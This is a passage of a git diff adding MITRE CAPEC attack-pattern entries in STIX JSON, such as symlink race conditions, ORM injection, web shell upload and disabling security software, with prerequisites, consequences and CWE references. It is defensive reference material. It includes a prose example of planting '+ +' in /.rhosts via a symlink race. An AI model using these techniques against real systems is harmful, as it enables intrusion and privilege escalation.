traffic, the C2 server must have been created in the CDN." + ], + "x_capec_skills_required": { + "Medium": "The adversary must have some knowledge of how messages are routed." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--1c60fdca-a7a5-46d2-9544-6c0b6b73818f.json b/capec/attack-pattern/attack-pattern--1c60fdca-a7a5-46d2-9544-6c0b6b73818f.json new file mode 100644 index 0000000000..c651a95f4d --- /dev/null +++ b/capec/attack-pattern/attack-pattern--1c60fdca-a7a5-46d2-9544-6c0b6b73818f.json @@ -0,0 +1,99 @@ +{ + "type": "bundle", + "id": "bundle--3cac3685-e209-4026-824f-9d811b9fdf4c", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--1c60fdca-a7a5-46d2-9544-6c0b6b73818f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Leveraging Race Conditions via Symbolic Links", + "description": "This attack leverages the use of symbolic links (Symlinks) in order to write to sensitive files. An attacker can create a Symlink link to a target file not otherwise accessible to her. When the privileged program tries to create a temporary file with the same name as the Symlink link, it will actually write to the target file pointed to by the attackers' Symlink link. If the attacker can insert malicious content in the temporary file she will be writing to the sensitive file by using the Symlink. The race occurs because the system checks if the temporary file exists, then creates the file. The attacker would typically create the Symlink during the interval between the check and the creation of the temporary file.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/27.html", + "external_id": "CAPEC-27" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/367.html", + "external_id": "CWE-367" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/61.html", + "external_id": "CWE-61" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/662.html", + "external_id": "CWE-662" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/689.html", + "external_id": "CWE-689" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/667.html", + "external_id": "CWE-667" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "url": "http://en.wikipedia.org/wiki/Symlink_race", + "external_id": "REF-115" + }, + { + "source_name": "reference_from_CAPEC", + "description": "mkstemp (IEEE Std 1003.1, 2004 Edition), The Open Group Base Specifications Issue 6", + "url": "http://www.opengroup.org/onlinepubs/009695399/functions/mkstemp.html", + "external_id": "REF-116" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "\n In this naive example, the Unix program foo is setuid. Its function is to retrieve information for the accounts specified by the user. For \"efficiency,\" it sorts the requested accounts into a temporary file (/tmp/foo naturally) before making the queries.\n The directory /tmp is world-writable. Malicious user Mallory creates a symbolic link to the file /.rhosts named /tmp/foo. Then, she invokes foo with \"user\" as the requested account. The program creates the (temporary) file /tmp/foo (really creating /.rhosts) and puts the requested account (e.g. \"user password\")) in it. It removes the temporary file (merely removing the symbolic link).\n Now the /.rhosts contains + +, which is the incantation necessary to allow anyone to use rlogin to log into the computer as the superuser.\n [R.27.1]\n ", + "GNU \"ed\" utility (before 0.3) allows local users to overwrite arbitrary files via a symlink attack on temporary files, possibly in the open_sbuf function. See also: CVE-2006-6939", + "OpenmosixCollector and OpenMosixView in OpenMosixView 1.5 allow local users to overwrite or delete arbitrary files via a symlink attack on (1) temporary files in the openmosixcollector directory or (2) nodes.tmp. See also: CVE-2005-0894", + "Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails. See also: CVE-2000-0972" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The attacker is able to create Symlink links on the target host.", + "Tainted data from the attacker is used and copied to temporary files.", + "The target host does insecure temporary file creation." + ], + "x_capec_skills_required": { + "Medium": "This attack is sophisticated because the attacker has to overcome a few challenges such as creating symlinks on the target host during a precise timing, inserting malicious data in the temporary file and have knowledge about the temporary files created (file name and function which creates them)." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--1c638c80-8f7d-439c-9746-6c8c902afeba.json b/capec/attack-pattern/attack-pattern--1c638c80-8f7d-439c-9746-6c8c902afeba.json new file mode 100644 index 0000000000..6a0e14adcc --- /dev/null +++ b/capec/attack-pattern/attack-pattern--1c638c80-8f7d-439c-9746-6c8c902afeba.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--9a5ceeec-abe0-4844-9ba1-05990a4fed58", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--1c638c80-8f7d-439c-9746-6c8c902afeba", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Information Gathering from Non-Traditional Sources", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. Please refer to CAPEC-118 : Collect and Analyze Information.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/409.html", + "external_id": "CAPEC-409" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--1c8cd7af-cc50-486e-a444-99781d82c018.json b/capec/attack-pattern/attack-pattern--1c8cd7af-cc50-486e-a444-99781d82c018.json new file mode 100644 index 0000000000..dcef6af349 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--1c8cd7af-cc50-486e-a444-99781d82c018.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--be21224c-246d-42ca-9b93-202c12e92c37", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--1c8cd7af-cc50-486e-a444-99781d82c018", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Target Influence via The Human Buffer Overflow", + "description": "An attacker utilizes a technique to insinuate commands to the subconscious mind of the target via communication patterns. The human buffer overflow methodology does not rely on over-stimulating the mind of the target, but rather embedding messages within communication that the mind of the listener assembles at a subconscious level. The human buffer-overflow method is similar to subconscious programming to the extent that messages are embedded within the message. The fundamental difference is that embedded messages have a complete semantic quality, rather than mere imagery, and the mind of the target tends to key off of particular dominant patterns. The remaining information, carefully structured, speaks directly to the subconscious with a subtle, indirect, command. The effect is to produce a pattern of thinking that the attacker has predetermined but is buried within the message and not overtly stated. Structuring a human \"buffer overflow\" requires precise attention to detail and the use of information in a manner that distracts the conscious mind from the message the subconscious is receiving.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/433.html", + "external_id": "CAPEC-433" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "url": "http://www.social-engineer.org", + "external_id": "REF-348" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--1cfd2b18-1f29-43cc-b800-4a52fa63f388.json b/capec/attack-pattern/attack-pattern--1cfd2b18-1f29-43cc-b800-4a52fa63f388.json new file mode 100644 index 0000000000..c9ce354621 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--1cfd2b18-1f29-43cc-b800-4a52fa63f388.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--5689a0d0-8858-4989-bc83-3d8b8382e47a", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--1cfd2b18-1f29-43cc-b800-4a52fa63f388", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Principal Spoof", + "description": "A Principal Spoof is a form of Identity Spoofing where an adversary pretends to be some other person in an interaction. This is often accomplished by crafting a message (either written, verbal, or visual) that appears to come from a person other than the adversary. Phishing and Pharming attacks often attempt to do this so that their attempts to gather sensitive information appear to come from a legitimate source. A Principal Spoof does not use stolen or spoofed authentication credentials, instead relying on the appearance and content of the message to reflect identity. The possible outcomes of a Principal Spoof mirror those of Identity Spoofing. (e.g., escalation of privilege and false attribution of data or activities) Likewise, most techniques for Identity Spoofing (crafting messages or intercepting and replaying or modifying messages) can be used for a Principal Spoof attack. However, because a Principal Spoof is used to impersonate a person, social engineering can be both an attack technique (using social techniques to generate evidence in support of a false identity) as well as a possible outcome (manipulating people's perceptions by making statements or performing actions under a target's name).", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/195.html", + "external_id": "CAPEC-195" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "The target must associate data or activities with a person's identity and the adversary must be able to modify this identity without detection." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--1d2043e7-db0e-45a8-ac46-a8403c5127a4.json b/capec/attack-pattern/attack-pattern--1d2043e7-db0e-45a8-ac46-a8403c5127a4.json new file mode 100644 index 0000000000..95e0c9fa81 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--1d2043e7-db0e-45a8-ac46-a8403c5127a4.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--1cb061df-2b6f-4d92-8d59-9db4bfcc2132", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--1d2043e7-db0e-45a8-ac46-a8403c5127a4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Remote Code Inclusion", + "description": "The attacker forces an application to load arbitrary code files from a remote location. The attacker could use this to try to load old versions of library files that have known vulnerabilities, to load malicious files that the attacker placed on the remote machine, or to otherwise change the functionality of the targeted application in unexpected ways.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/253.html", + "external_id": "CAPEC-253" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html", + "external_id": "CWE-829" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "Target application server must allow remote files to be included.The malicious file must be placed on the remote machine previously." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--1de57984-2365-426b-9b6c-5a08f86b0aac.json b/capec/attack-pattern/attack-pattern--1de57984-2365-426b-9b6c-5a08f86b0aac.json new file mode 100644 index 0000000000..216cc970a1 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--1de57984-2365-426b-9b6c-5a08f86b0aac.json @@ -0,0 +1,92 @@ +{ + "type": "bundle", + "id": "bundle--d51e61ad-6c29-4813-808b-d73bca7c4ea4", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--1de57984-2365-426b-9b6c-5a08f86b0aac", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Object Relational Mapping Injection", + "description": "An attacker leverages a weakness present in the database access layer code generated with an Object Relational Mapping (ORM) tool or a weakness in the way that a developer used a persistence framework to inject his or her own SQL commands to be executed against the underlying database. The attack here is similar to plain SQL injection, except that the application does not use JDBC to directly talk to the database, but instead it uses a data access layer generated by an ORM tool or framework (e.g. Hibernate). While most of the time code generated by an ORM tool contains safe access methods that are immune to SQL injection, sometimes either due to some weakness in the generated code or due to the fact that the developer failed to use the generated access methods properly, SQL injection is still possible.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/109.html", + "external_id": "CAPEC-109" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/100.html", + "external_id": "CWE-100" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html", + "external_id": "CWE-89" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/564.html", + "external_id": "CWE-564" + }, + { + "source_name": "reference_from_CAPEC", + "description": "OWASP Testing Guide (v4 [DRAFT]), The Open Web Application Security Project (OWASP)", + "url": "http://www.owasp.org/index.php/Testing_for_ORM_Injection", + "external_id": "REF-4" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "When using Hibernate, it is possible to use the session.find() method to run queries against the database. This is an overloaded method that provides facilities to perform binding between the supplied user data and place holders in the statically defined query. However, it is also possible to use the session.find() method without using any of these query binding overloads, hence effectively concatenating the user supplied data with rest of the SQL query, resulting in a possibility for SQL injection. While the framework may provide mechanisms to use methods immune to SQL injections, it may also contain ways that are not immune that may be chosen by the developer." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An application uses data access layer generated by an ORM tool or framework", + "An application uses user supplied data in queries executed against the database", + "The separation between data plane and control plane is not ensured, through either developer error or an underlying weakness in the data access layer code generation framework" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Knowledge of general SQL injection techniques and subtleties of the ORM framework is needed" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--1eb173db-e5ae-4bf1-b5e4-b4d944ded3db.json b/capec/attack-pattern/attack-pattern--1eb173db-e5ae-4bf1-b5e4-b4d944ded3db.json new file mode 100644 index 0000000000..0db4bbefc4 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--1eb173db-e5ae-4bf1-b5e4-b4d944ded3db.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--e3cee08c-49dd-4a2f-aaa8-aac7f85c1b0f", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--1eb173db-e5ae-4bf1-b5e4-b4d944ded3db", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Fault Injection", + "description": "The adversary uses disruptive signals or events (e.g. electromagnetic pulses, laser pulses, clock glitches, etc.) to cause faulty behavior in electronic devices. When performed in a controlled manner on devices performing cryptographic operations, this faulty behavior can be exploited to derive secret key information.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/624.html", + "external_id": "CAPEC-624" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_alternate_terms": [ + "Side-Channel Attack" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (An adversary capable of successfully collecting and analyzing sensitive, fault/side-channel information, he or she has compromised the confidentiality of that application or information system data.)", + "Bypass Protection Mechanism (An adversary capable of successfully collecting and analyzing sensitive, fault/side-channel information, he or she has compromised the confidentiality of that application or information system data.)", + "Hide Activities (An adversary capable of successfully collecting and analyzing sensitive, fault/side-channel information, he or she has compromised the confidentiality of that application or information system data.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (If an adversary is able to inject data via a fault or side channel vulnerability towards malicious ends, the integrity of the application or information system will be compromised.)" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Physical access to the system", + "The adversary must be cognizant of where fault injection vulnerabilities exist in the system in order to leverage them for exploitation." + ], + "x_capec_resources_required": [ + "\n The relevant sensors and tools to detect and analyze fault/side-channel data from a system.\n A tool capable of injecting fault/side-channel data into a system or application.\n " + ], + "x_capec_skills_required": { + "High": "Adversaries require non-trivial technical skills to create and implement fault injection attacks. Although this style of attack has become easier (commercial equipment and training classes are available to perform these attacks), they usual require significant setup and experimentation time during which physical access to the device is required." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--1f0f0fdc-0bf2-45a8-8231-5e3789895f80.json b/capec/attack-pattern/attack-pattern--1f0f0fdc-0bf2-45a8-8231-5e3789895f80.json new file mode 100644 index 0000000000..c5d0399c8d --- /dev/null +++ b/capec/attack-pattern/attack-pattern--1f0f0fdc-0bf2-45a8-8231-5e3789895f80.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--cb47fd86-3b75-4f38-bc30-56d897e93955", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--1f0f0fdc-0bf2-45a8-8231-5e3789895f80", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Jamming", + "description": "An adversary uses radio noise or signals in an attempt to disrupt communications. By intentionally overwhelming system resources with illegitimate traffic, service is denied to the legitimate traffic of authorized users.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/601.html", + "external_id": "CAPEC-601" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Availability": [ + "Other (The jamming of equipment denies the availability of functioning communications services.)" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--1f3bd742-4a95-4a3d-acd6-f82b15720d9f.json b/capec/attack-pattern/attack-pattern--1f3bd742-4a95-4a3d-acd6-f82b15720d9f.json new file mode 100644 index 0000000000..9dce4737ed --- /dev/null +++ b/capec/attack-pattern/attack-pattern--1f3bd742-4a95-4a3d-acd6-f82b15720d9f.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--2913b8cd-d46f-4c24-8509-f0176fb853b4", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--1f3bd742-4a95-4a3d-acd6-f82b15720d9f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-05-04T00:00:00.000Z", + "modified": "2018-05-04T00:00:00.000Z", + "name": "Probe System Files", + "description": "An adversary obtains unauthorized information due to improperly protected files. If an application stores sensitive information in a file that is not protected by proper access control, then an adversary can access the file and search for sensitive information.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/639.html", + "external_id": "CAPEC-639" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/552.html", + "external_id": "CWE-552" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_example_instances": [ + "Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.", + "Adversaries may search network shares on computers they have compromised to find files of interest." + ], + "x_capec_prerequisites": [ + "An adversary has access to the file system of a system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--1fd71a54-9d48-4adb-805d-11e5498f6242.json b/capec/attack-pattern/attack-pattern--1fd71a54-9d48-4adb-805d-11e5498f6242.json new file mode 100644 index 0000000000..282c09b358 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--1fd71a54-9d48-4adb-805d-11e5498f6242.json @@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--fa84b47f-6d5f-4634-8d11-94d5b5f78499", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--1fd71a54-9d48-4adb-805d-11e5498f6242", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-05-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Upload a Web Shell to a Web Server", + "description": "By exploiting insufficient permissions, it is possible to upload a web shell to a web server in such a way that it can be executed remotely. This shell can have various capabilities, thereby acting as a \"gateway\" to the underlying web server. The shell might execute at the higher permission level of the web server, providing the ability the execute malicious code at elevated levels.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/650.html", + "external_id": "CAPEC-650" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html", + "external_id": "CWE-287" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/553.html", + "external_id": "CWE-553" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_prerequisites": [ + "The web server is susceptible to one of the various web application exploits that allows for uploading a shell file." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--20fe1304-714f-4f97-8a4e-cade0aeefa04.json b/capec/attack-pattern/attack-pattern--20fe1304-714f-4f97-8a4e-cade0aeefa04.json new file mode 100644 index 0000000000..f64ec7962e --- /dev/null +++ b/capec/attack-pattern/attack-pattern--20fe1304-714f-4f97-8a4e-cade0aeefa04.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--476a0950-a572-488c-959a-c35e17b90206", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--20fe1304-714f-4f97-8a4e-cade0aeefa04", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Run Software at Logon", + "description": "Operating system allows logon scripts to be run whenever a specific user or users logon to a system. If adversaries can access these scripts, they may insert additional code into the logon script. This code can allow them to maintain persistence or move laterally within an enclave because it is executed every time the affected user or users logon to a computer. Modifying logon scripts can effectively bypass workstation and enclave firewalls. Depending on the access configuration of the logon scripts, either local credentials or a remote administrative account may be necessary.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/564.html", + "external_id": "CAPEC-564" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html", + "external_id": "CWE-284" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--21a2d614-a94e-4e3a-bcf3-3a4b20ecb2cb.json b/capec/attack-pattern/attack-pattern--21a2d614-a94e-4e3a-bcf3-3a4b20ecb2cb.json new file mode 100644 index 0000000000..9ca0154574 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--21a2d614-a94e-4e3a-bcf3-3a4b20ecb2cb.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--2d5fac68-3486-46e2-9754-25ed5e8c8edb", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--21a2d614-a94e-4e3a-bcf3-3a4b20ecb2cb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Disable Security Software", + "description": "An adversary exploits a weakness in access control to disable security tools so that detection does not occur. This can take the form of killing processes, deleting registry keys so that tools do not start at run time, deleting log files, or other methods.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/578.html", + "external_id": "CAPEC-578" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html", + "external_id": "CWE-284" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Availability": [ + "Hide Activities (By disabling certain security tools, the adversary can hide malicious activity and avoid detection.)" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have the capability to interact with the configuration of the targeted system." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Usable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--21bfa3d5-3aa2-450e-bbe4-5bf8f49e3c2f.json b/capec/attack-pattern/attack-pattern--21bfa3d5-3aa2-450e-bbe4-5bf8f49e3c2f.json new file mode 100644 index 0000000000..3db711dfe0 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--21bfa3d5-3aa2-450e-bbe4-5bf8f49e3c2f.json @@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--5a513095-7510-4733-8f90-ac6f7414457e", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--21bfa3d5-3aa2-450e-bbe4-5bf8f49e3c2f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Passing Local Filenames to Functions That Expect a URL", + "description": "This attack relies on client side code to access local files and resources instead of URLs. When the client browser is expecting a URL string, but instead receives a request for a local file, that execution is likely to occur in the browser process space with the browser's authority to local files. The attacker can send the results of this request to the local files out to a site that they control. This attack may be used to steal sensitive authentication data (either local or remote), or to gain system profile information to launch further attacks.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/48.html", + "external_id": "CAPEC-48" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/241.html", + "external_id": "CWE-241" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/706.html", + "external_id": "CWE-706" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Core Concepts: Attack Patterns", + "url": "https://websec.io/2012/11/26/Core-Concepts-Attack-Patterns.html", + "external_id": "REF-416" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "\n J2EE applications frequently use .properties files to store configuration information including JDBC connections, LDAP connection strings, proxy information, system passwords and other system metadata that is valuable to attackers looking to probe the system or bypass policy enforcement points. When these files are stored in publicly accessible directories and are allowed to be read by the public user, then an attacker can list the directory identify a .properties file and simply load its contents in the browser listing its contents. A standard Hibernate properties file contains\n hibernate.connection.driver_class = org.postgresql.Driverhibernate.connection.url = jdbc:postgresql://localhost/mydatabasehibernate.connection.username = usernamehibernate.connection.password = passwordhibernate.c3p0.min_size=5hibernate.c3p0.max_size=20\n Even if the attacker cannot write this file, there is plenty of information to leverage to gain further access.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The victim's software must not differentiate between the location and type of reference passed the client software, e.g. browser" + ], + "x_capec_skills_required": { 